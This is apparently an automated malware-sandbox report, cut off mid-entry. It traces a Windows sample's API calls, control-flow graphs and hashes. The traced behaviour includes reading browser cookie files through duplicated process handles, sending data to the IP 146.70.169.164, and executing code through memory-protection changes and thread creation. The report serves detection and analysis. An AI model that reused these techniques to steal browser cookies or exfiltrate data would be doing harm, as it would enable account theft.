                                            • Part of subcall function 038F42EC: GetModuleHandleA.KERNEL32(ntdll,NtQueryObject,?,?,?,?,038F4574), ref: 038F431F
                                            • Part of subcall function 038F42EC: GetProcAddress.KERNEL32(00000000), ref: 038F4322
                                            • Part of subcall function 038F42EC: OpenProcess.KERNEL32(00000040,00000000,00000000,?,?,?,?,038F4574), ref: 038F43A4
                                            • Part of subcall function 038F42EC: GetCurrentProcess.KERNEL32(038F4574,00000000,00000000,00000002,?,?,?,?,038F4574), ref: 038F43C0
                                            • Part of subcall function 038F42EC: DuplicateHandle.KERNEL32(?,?,00000000,?,?,?,?,038F4574), ref: 038F43CF
                                            • Part of subcall function 038F42EC: CloseHandle.KERNEL32(038F4574,?,?,?,?,038F4574), ref: 038F43FF
                                            • Part of subcall function 038F3536: GetProcessHeap.KERNEL32(00000000,00000000,038F518A), ref: 038F353D
                                            • Part of subcall function 038F3536: RtlFreeHeap.NTDLL(00000000), ref: 038F3544
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave$HandleHeapProcess$AddressModuleProc$AllocateAttributesCloseCurrentDuplicateFileFreeOpen
                                          • String ID: @$\??\%s$\Network\Cookies
                                          • API String ID: 330363434-2791195959
                                          • Opcode ID: a6d60ece5ee319b437369cb6ba05a56b43c3c354c19a29261e148e085051a824
                                          • Instruction ID: a737cc7a76cc95934728fb0c962d47a8c435c6d19cad6ef00939bc28d4b1d18f
                                          • Opcode Fuzzy Hash: a6d60ece5ee319b437369cb6ba05a56b43c3c354c19a29261e148e085051a824
                                          • Instruction Fuzzy Hash: F8715A75A40608AFEB44EFD4D849FADBBB5FB48304F108096FA01EA2D1DBB49A45CB51

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2953 38f536d-38f53f6 call 38f46d4 2956 38f53ff-38f5457 2953->2956 2957 38f53f8-38f53fa 2953->2957 2960 38f545d-38f548b call 38f5361 socket 2956->2960 2961 38f553b 2956->2961 2958 38f553e-38f5541 2957->2958 2964 38f5531-38f5534 2960->2964 2965 38f5491-38f54a8 call 38f52cf call 38f3576 2960->2965 2961->2958 2964->2961 2970 38f54a9-38f54af 2965->2970 2971 38f5524-38f552a 2970->2971 2972 38f54b1-38f54c6 connect 2970->2972 2971->2964 2973 38f54c8-38f54e8 send 2972->2973 2974 38f5517-38f5522 Sleep 2972->2974 2973->2974 2975 38f54ea-38f5504 send 2973->2975 2974->2970 2975->2974 2976 38f5506-38f5515 call 38f3536 2975->2976 2976->2971
                                          APIs
                                            • Part of subcall function 038F46D4: GetModuleHandleA.KERNEL32(ntdl,0000011C,?,?,?,?,?,?,?,038F4812), ref: 038F46E6
                                            • Part of subcall function 038F46D4: LoadLibraryA.KERNELBASE(ntdl,?,?,?,?,?,?,?,038F4812), ref: 038F46F3
                                          • socket.WS2_32(?,00000001,00000000), ref: 038F5480
                                          • connect.WS2_32(000000FF,?,00000010), ref: 038F54BF
                                          • send.WS2_32(000000FF,00000000,00000000), ref: 038F54E1
                                          • send.WS2_32(000000FF,000000FF,00000037,00000000), ref: 038F54FD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: send$HandleLibraryLoadModuleconnectsocket
                                          • String ID: 146.70.169.164$ws2_32.dll
                                          • API String ID: 2781119014-4085977579
                                          • Opcode ID: 40bf6940c2a59249b7d8efd4b3ec1803c5ff1b91bf34732e896b616049e3cd47
                                          • Instruction ID: 0a018247816b801c591d8c53c318a76eb7e5d9af4d26a8c5313ae277c43727c2
                                          • Opcode Fuzzy Hash: 40bf6940c2a59249b7d8efd4b3ec1803c5ff1b91bf34732e896b616049e3cd47
                                          • Instruction Fuzzy Hash: FD518330C04289EEEB11CBE8D809BEDBFB99F16314F144189E660EE1C1C3B54746CB65
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: d
                                          • API String ID: 0-2564639436
                                          • Opcode ID: 79d5b2422a162a63b8a5afe30036f8331e81c35a5b28bbf06c0772a3851e767b
                                          • Instruction ID: 54679a3f8bd3adc9d73c1d9c95d6dbe9786f23d946358f825c2f4d018f9f3939
                                          • Opcode Fuzzy Hash: 79d5b2422a162a63b8a5afe30036f8331e81c35a5b28bbf06c0772a3851e767b
                                          • Instruction Fuzzy Hash: 1A633471D04A1CCACB22EF68C9916AEF775FF56345F1082C6D40A3A201EB39AAD5DF41

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 3853 783fe0-784015 3855 78401b-784022 3853->3855 3856 7842a1-7842b9 3853->3856 3858 78402d-784033 3855->3858 3861 7842bf-7842c9 3856->3861 3862 784554-78456c 3856->3862 3859 784039-784050 3858->3859 3860 7840e4-7840eb 3858->3860 3866 78405b-784061 3859->3866 3864 7840f6-7840fc 3860->3864 3863 7842da-7842e3 3861->3863 3873 7847f8-784810 3862->3873 3874 784572-784579 3862->3874 3867 7842e9-784300 3863->3867 3868 784397-78439e 3863->3868 3869 7841c0-7841c7 3864->3869 3870 784102-784109 3864->3870 3871 7840cd-7840df 3866->3871 3872 784063-7840cb call 771dc0 call 771cc0 3866->3872 3877 78430b-784311 3867->3877 3878 7843a9-7843af 3868->3878 3875 7841d2-7841d8 3869->3875 3879 784114-78411a 3870->3879 3871->3858 3872->3866 3885 784a36-784a3d 3873->3885 3886 784816-78481d 3873->3886 3882 784584-78458a 3874->3882 3887 7841da-7841e1 3875->3887 3888 784236-78423f 3875->3888 3889 784380-784392 3877->3889 3890 784313-78437e call 771dc0 call 771cc0 3877->3890 3891 784473-78447a 3878->3891 3892 7843b5-7843bc 3878->3892 3893 7841bb 3879->3893 3894 784120-7841b6 call 771d90 call 771de0 call 771d10 3879->3894 3883 78463b-784642 3882->3883 3884 784590-7845a7 3882->3884 3897 78464d-784653 3883->3897 3904 7845b2-7845b8 3884->3904 3900 784bae-784bb1 3885->3900 3901 784a43-784ba4 call 774c60 call 7745b0 call 774a60 call 774550 GetModuleHandleA GetProcAddress call 774e20 call 774670 call 774ff0 call 774670 call 7751b0 call 774670 call 775370 call 774690 call 775530 call 774690 call 775610 call 7746b0 call 7756f0 call 7746b0 call 7d0910 VirtualProtect * 2 call 7d0910 VirtualProtect 3885->3901 3905 784828-78482e 3886->3905 3907 7841ec-7841f2 3887->3907 3909 784241-784245 3888->3909 3910 784246-784248 3888->3910 3889->3863 3890->3877 3896 784485-78448b 3891->3896 3908 7843c7-7843cd 3892->3908 3893->3864 3894->3879 3911 7844e9-7844f2 3896->3911 3912 78448d-784494 3896->3912 3913 784659-784660 3897->3913 3914 784717-78471e 3897->3914 3901->3900 3919 7845ba-784622 call 771dc0 call 771cc0 3904->3919 3920 784624-784636 3904->3920 3921 7848df-7848e6 3905->3921 3922 784834-78484b 3905->3922 3923 784234 3907->3923 3924 7841f4-784232 call 771e00 3907->3924 3925 78446e 3908->3925 3926 7843d3-784469 call 771d90 call 771de0 call 771d10 3908->3926 3909->3910 3927 78424a-784272 call 7d4870 3910->3927 3928 784274-784299 call 7d4870 3910->3928 3936 7844f9-7844fb 3911->3936 3937 7844f4-7844f8 3911->3937 3932 78449f-7844a5 3912->3932 3933 78466b-784671 3913->3933 3940 784729-78472f 3914->3940 3919->3904 3920->3882 3943 7848f1-7848f7 3921->3943 3942 784856-78485c 3922->3942 3923->3875 3924->3907 3925->3878 3926->3908 3968 78429c 3927->3968 3928->3968 3949 7844e7 3932->3949 3950 7844a7-7844e5 call 771e00 3932->3950 3952 784712 3933->3952 3953 784677-78470d call 771d90 call 771de0 call 771d10 3933->3953 3955 7844fd-784525 call 7d4870 3936->3955 3956 784527-78454c call 7d4870 3936->3956 3937->3936 3958 78478d-784796 3940->3958 3959 784731-784738 3940->3959 3961 7848c8-7848da 3942->3961 3962 78485e-7848c6 call 771dc0 call 771cc0 3942->3962 3963 7849bb-7849c2 3943->3963 3964 7848fd-784904 3943->3964 3949->3896 3950->3932 3952->3897 3953->3933 4011 78454f 3955->4011 3956->4011 3986 784798-78479c 3958->3986 3987 78479d-78479f 3958->3987 3980 784743-784749 3959->3980 3961->3905 3962->3942 3969 7849cd-7849d3 3963->3969 3983 78490f-784915 3964->3983 3968->3856 3988 784a31 3969->3988 3989 7849d5-7849dc 3969->3989 3996 78478b 3980->3996 3997 78474b-784789 call 771e00 3980->3997 4000 78491b-7849b1 call 771d90 call 771de0 call 771d10 3983->4000 4001 7849b6 3983->4001 3986->3987 4003 7847cb-7847f0 call 7d4870 3987->4003 4004 7847a1-7847c9 call 7d4870 3987->4004 3988->3885 4007 7849e7-7849ed 3989->4007 3996->3940 3997->3980 4000->3983 4001->3943 4030 7847f3 4003->4030 4004->4030 4022 784a2f 4007->4022 4023 7849ef-784a2d call 771e00 4007->4023 4011->3862 4022->3969 4023->4007 4030->3873
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: d
                                          • API String ID: 0-2564639436
                                          • Opcode ID: 246aa282021b39364b9227e0e5728236274c65a6399445ce5fc7c19e63945e6c
                                          • Instruction ID: 1ae969a2594188720a34a5b721878621c0a3201d4a4698a9280369f441af61bd
                                          • Opcode Fuzzy Hash: 246aa282021b39364b9227e0e5728236274c65a6399445ce5fc7c19e63945e6c
                                          • Instruction Fuzzy Hash: 9F725971D00A1DCBCB11EFA4D8856EEF775FF56344F108289E40A7A241EB78AA91DF41
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: d
                                          • API String ID: 0-2564639436
                                          • Opcode ID: 84987e539f1f7f998e8b423c4d31815661eda737b4081d682830a396011854fe
                                          • Instruction ID: 250b1373ac35a6452548307def754ee8022eb163c0579a532c1fe635ec300f1f
                                          • Opcode Fuzzy Hash: 84987e539f1f7f998e8b423c4d31815661eda737b4081d682830a396011854fe
                                          • Instruction Fuzzy Hash: A3D33471D04A1CCACB26EF68C9916AEF775FF56344F1082CAD40A3A241EB35AAD1DF41

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 5731 38f484b-38f485a 5732 38f4b90 5731->5732 5733 38f4860-38f4879 VirtualAlloc 5731->5733 5734 38f4b96-38f4b99 5732->5734 5733->5732 5735 38f487f-38f48a3 call 38f46d4 5733->5735 5736 38f4b9c-38f4ba1 5734->5736 5739 38f4b8c-38f4b8e 5735->5739 5740 38f48a9-38f48be call 38f354b 5735->5740 5739->5736 5743 38f48c0-38f48c7 5740->5743 5744 38f48c9-38f48ce 5743->5744 5745 38f48d2-38f48d5 5743->5745 5744->5743 5746 38f48d0 5744->5746 5747 38f48d9-38f4900 GetCurrentProcess IsWow64Process call 38f5239 5745->5747 5746->5747 5750 38f4906-38f490b 5747->5750 5751 38f4990-38f4993 5747->5751 5754 38f490d-38f491d 5750->5754 5755 38f492c-38f4931 5750->5755 5752 38f4995-38f4998 5751->5752 5753 38f49e0-38f49e3 5751->5753 5756 38f499a-38f49b6 5752->5756 5757 38f49b8-38f49bc 5752->5757 5759 38f4a8e-38f4a94 5753->5759 5760 38f49e9-38f49ee 5753->5760 5758 38f491f-38f4927 5754->5758 5761 38f4933-38f4938 5755->5761 5762 38f4971-38f4974 5755->5762 5767 38f4a32-38f4a3f 5756->5767 5757->5732 5768 38f49c2-38f49de 5757->5768 5758->5767 5765 38f4b2f-38f4b32 5759->5765 5766 38f4a9a-38f4aa0 5759->5766 5769 38f4a10-38f4a12 5760->5769 5770 38f49f0-38f4a0e 5760->5770 5761->5754 5771 38f493a-38f493c 5761->5771 5763 38f497f-38f498e 5762->5763 5764 38f4976-38f4979 5762->5764 5763->5758 5764->5732 5764->5763 5765->5732 5772 38f4b34-38f4b55 5765->5772 5776 38f4aa2-38f4abb 5766->5776 5777 38f4ac0-38f4ac6 5766->5777 5767->5734 5768->5767 5773 38f4a44-38f4a47 5769->5773 5774 38f4a14-38f4a2d 5769->5774 5770->5767 5771->5754 5775 38f493e-38f4941 5771->5775 5778 38f4b77 5772->5778 5779 38f4b57-38f4b5d 5772->5779 5782 38f4a49-38f4a62 5773->5782 5783 38f4a67-38f4a6a 5773->5783 5774->5767 5780 38f4957-38f495a 5775->5780 5781 38f4943-38f4955 5775->5781 5776->5734 5784 38f4ac8-38f4ae1 5777->5784 5785 38f4ae6-38f4aec 5777->5785 5789 38f4b7c-38f4b83 5778->5789 5779->5778 5786 38f4b5f-38f4b65 5779->5786 5780->5732 5787 38f4960-38f496f 5780->5787 5781->5758 5782->5734 5783->5732 5788 38f4a70-38f4a89 5783->5788 5784->5734 5790 38f4aee-38f4b07 5785->5790 5791 38f4b0c-38f4b12 5785->5791 5786->5778 5792 38f4b67-38f4b6d 5786->5792 5787->5758 5788->5734 5789->5734 5790->5734 5791->5772 5793 38f4b14-38f4b2d 5791->5793 5792->5778 5794 38f4b6f-38f4b75 5792->5794 5793->5734 5794->5778 5795 38f4b85-38f4b8a 5794->5795 5795->5789
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040,0000011C,?,?,?,?,?,038F22C4), ref: 038F486C
                                            • Part of subcall function 038F46D4: GetModuleHandleA.KERNEL32(ntdl,0000011C,?,?,?,?,?,?,?,038F4812), ref: 038F46E6
                                            • Part of subcall function 038F46D4: LoadLibraryA.KERNELBASE(ntdl,?,?,?,?,?,?,?,038F4812), ref: 038F46F3
                                          • GetCurrentProcess.KERNEL32(038F22C4), ref: 038F48E0
                                          • IsWow64Process.KERNEL32(00000000), ref: 038F48E7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$AllocCurrentHandleLibraryLoadModuleVirtualWow64
                                          • String ID: l$ntdl
                                          • API String ID: 1207166019-924918826
                                          • Opcode ID: 6120590783a698053a3689a6bc3495444080c1ad1753c8c36d20b52ecdd8cba4
                                          • Instruction ID: e8a00122bfbc5d03d82198b3c26e1dfc3b50599d6a01b9d28a52b4623bbc705c
                                          • Opcode Fuzzy Hash: 6120590783a698053a3689a6bc3495444080c1ad1753c8c36d20b52ecdd8cba4
                                          • Instruction Fuzzy Hash: D6818031608B049EEB24EAD5E855B7B33A8FB51718F2405DBE309DB3D5E7B4C684870A

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 5849 7cfca5-7cfcbd call 7d7e88 5852 7cfcbf-7cfccb 5849->5852 5853 7cfcd0-7cfd06 call 7d7e5d call 7cffb3 call 7d0489 5849->5853 5854 7cfdb9-7cfdc8 5852->5854 5862 7cfd08-7cfd11 call 7cff1f 5853->5862 5863 7cfd23-7cfd2c call 7d048f 5853->5863 5862->5863 5870 7cfd13-7cfd21 5862->5870 5868 7cfd2e-7cfd37 call 7cff1f 5863->5868 5869 7cfd41-7cfd56 call 7d05aa call 7d7e0a call 78cf50 5863->5869 5868->5869 5876 7cfd39-7cfd40 call 7d8191 5868->5876 5882 7cfd5b-7cfd64 call 7d05e0 5869->5882 5870->5863 5876->5869 5885 7cfd66-7cfd68 5882->5885 5886 7cfdd0-7cfdde call 7d81b7 call 7d817b 5882->5886 5887 7cfd6f-7cfd82 call 7cffd0 5885->5887 5888 7cfd6a call 7d816c 5885->5888 5887->5854 5888->5887
                                          APIs
                                          • ___scrt_release_startup_lock.LIBCMT ref: 007CFCF5
                                          • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 007CFD09
                                          • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 007CFD2F
                                          • ___scrt_uninitialize_crt.LIBCMT ref: 007CFD72
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: ___scrt_is_nonwritable_in_current_image$___scrt_release_startup_lock___scrt_uninitialize_crt
                                          • String ID: VPWh
                                          • API String ID: 3089971210-353207083
                                          • Opcode ID: 5c8f9076b44cf1222685ae619e120accb53c93552cde8b84cf73e132d1deab5e
                                          • Instruction ID: 3cd6d9689070e8f8127be93ee1ecc9cc89a4a314619f65cc49559952a379ce37
                                          • Opcode Fuzzy Hash: 5c8f9076b44cf1222685ae619e120accb53c93552cde8b84cf73e132d1deab5e
                                          • Instruction Fuzzy Hash: 50210433604659E6DB257B65AC0EFAE67729F42720F20053FF982673C2DE2E4C018695

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 5906 783052-783068 5908 78306a-7830ca LoadLibraryA CreateThread WaitForSingleObject FreeLibrary 5906->5908 5909 7830ce-7830d1 5906->5909 5908->5909
                                          APIs
                                          • LoadLibraryA.KERNELBASE(?), ref: 0078307F
                                          • CreateThread.KERNELBASE(00000000,00000000,?,00000000,00000000,00000000), ref: 007830A2
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007830B7
                                          • FreeLibrary.KERNEL32(?), ref: 007830C4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: Library$CreateFreeLoadObjectSingleThreadWait
                                          • String ID:
                                          • API String ID: 2432312608-0
                                          • Opcode ID: f2930e022828b0519e15a44364090fc36355b0a297037990825cb228e26a18c0
                                          • Instruction ID: ed88dbe67b5c764a5a5d7f0623851e1bb293c2dc1ba7a172eea71f9419d1bb47
                                          • Opcode Fuzzy Hash: f2930e022828b0519e15a44364090fc36355b0a297037990825cb228e26a18c0
                                          • Instruction Fuzzy Hash: 3F016D719803189BDB64CF54DC8CBA97734FB08715F1046C8E6195A2A1CAB96A80CF54

                                          Control-flow Graph

                                          APIs
                                          • EnterCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F3512
                                          • GetProcessHeap.KERNEL32(00000008,00000208,?,?,038F51B7), ref: 038F351B
                                          • RtlAllocateHeap.NTDLL(00000000,?,?,038F51B7), ref: 038F3522
                                          • LeaveCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F352B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalHeapSection$AllocateEnterLeaveProcess
                                          • String ID:
                                          • API String ID: 1367039788-0
                                          • Opcode ID: 7b793b13c9e0bbdbd84cef4c159e376889ff43729a7b3b52047eae6ea8ec640e
                                          • Instruction ID: 7645376029e490e513d3c92fcb0fb97ee24158d5b133ef12214d08b5d699b43d
                                          • Opcode Fuzzy Hash: 7b793b13c9e0bbdbd84cef4c159e376889ff43729a7b3b52047eae6ea8ec640e
                                          • Instruction Fuzzy Hash: E3D09E336005606FEB5036E9B80CD9BAAACEFD57A171500DAF205C3154CAA4880587A0

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 5911 38f46d4-38f46f0 GetModuleHandleA 5912 38f4706-38f470e 5911->5912 5913 38f46f2-38f46fd LoadLibraryA 5911->5913 5914 38f47dd 5912->5914 5915 38f4714-38f471f 5912->5915 5913->5912 5916 38f46ff-38f4701 5913->5916 5917 38f47e0-38f47e5 5914->5917 5915->5914 5918 38f4725-38f472e 5915->5918 5916->5917 5918->5914 5919 38f4734-38f4739 5918->5919 5919->5914 5920 38f473f-38f4743 5919->5920 5920->5914 5921 38f4749-38f476e 5920->5921 5922 38f47dc 5921->5922 5923 38f4770-38f477b 5921->5923 5922->5914 5924 38f477d-38f4787 5923->5924 5925 38f47cc-38f47da 5924->5925 5926 38f4789-38f47a3 call 38f3625 call 38f3b60 5924->5926 5925->5922 5925->5923 5931 38f47a5-38f47ad 5926->5931 5932 38f47b1-38f47c9 5926->5932 5931->5924 5933 38f47af 5931->5933 5932->5925 5933->5925
                                          APIs
                                          • GetModuleHandleA.KERNEL32(ntdl,0000011C,?,?,?,?,?,?,?,038F4812), ref: 038F46E6
                                          • LoadLibraryA.KERNELBASE(ntdl,?,?,?,?,?,?,?,038F4812), ref: 038F46F3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HandleLibraryLoadModule
                                          • String ID: ntdl
                                          • API String ID: 4133054770-3973061744
                                          • Opcode ID: a763937f858b2a392e54e1fad7fd3ac0e981d8cc6b7473b4b9f8970ef07e4d89
                                          • Instruction ID: 30e323f6751529466a5fe35c17b98359ed2efafc5d108ed4fcc54c5e05f737a8
                                          • Opcode Fuzzy Hash: a763937f858b2a392e54e1fad7fd3ac0e981d8cc6b7473b4b9f8970ef07e4d89
                                          • Instruction Fuzzy Hash: 3E319939E046199FCB24CFAAC490ABEF7B5BF4A314F08029AD611E7341C735A951CBA0
                                          APIs
                                          • __freea.LIBCMT ref: 007DEF97
                                            • Part of subcall function 007DAC15: RtlAllocateHeap.NTDLL(00000000,00000000,?,?,007CFB1F,00000000,?,0078322C,00000000,?,007713A5,00000000), ref: 007DAC47
                                          • __freea.LIBCMT ref: 007DEFAA
                                          • __freea.LIBCMT ref: 007DEFB7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: __freea$AllocateHeap
                                          • String ID:
                                          • API String ID: 2243444508-0
                                          • Opcode ID: 03cb9808f2efb27eba89e5d14468f7eb4d84a7e059c639d548791a869709002e
                                          • Instruction ID: dccf6bd6e6c5e15b3e6471ec625736c893e751a6e0c36d077805641b672ef3e1
                                          • Opcode Fuzzy Hash: 03cb9808f2efb27eba89e5d14468f7eb4d84a7e059c639d548791a869709002e
                                          • Instruction Fuzzy Hash: AB51837260020AAFEB26AF61DC45EAF7BB9EF44710F15012AFD08DE341E779DC5086A1
                                          APIs
                                            • Part of subcall function 007E2A95: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 007E2AC0
                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,007E2DA5,?,00000000,?,00000000,?), ref: 007E2FC2
                                          • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,007E2DA5,?,00000000,?,00000000,?), ref: 007E2FFE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: CodeInfoPageValid
                                          • String ID:
                                          • API String ID: 546120528-0
                                          • Opcode ID: 8ddd35358b8d7adcbf6ce00907e1b4c9fd636295e0116f9725f16ec6301f1391
                                          • Instruction ID: 2c654476867b22b0e24ffcbc2e7617b20e3672d35c907d7b2754083d74cf204b
                                          • Opcode Fuzzy Hash: 8ddd35358b8d7adcbf6ce00907e1b4c9fd636295e0116f9725f16ec6301f1391
                                          • Instruction Fuzzy Hash: 4B512870A017C59EDB20CF37C8896BABBF5FF48300F14856ED0968B252E67D9646CB50
                                          APIs
                                          • LCMapStringEx.KERNELBASE(?,007DEED2,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 007DE207
                                          • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,007DEED2,?,?,-00000008,?,00000000), ref: 007DE225
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
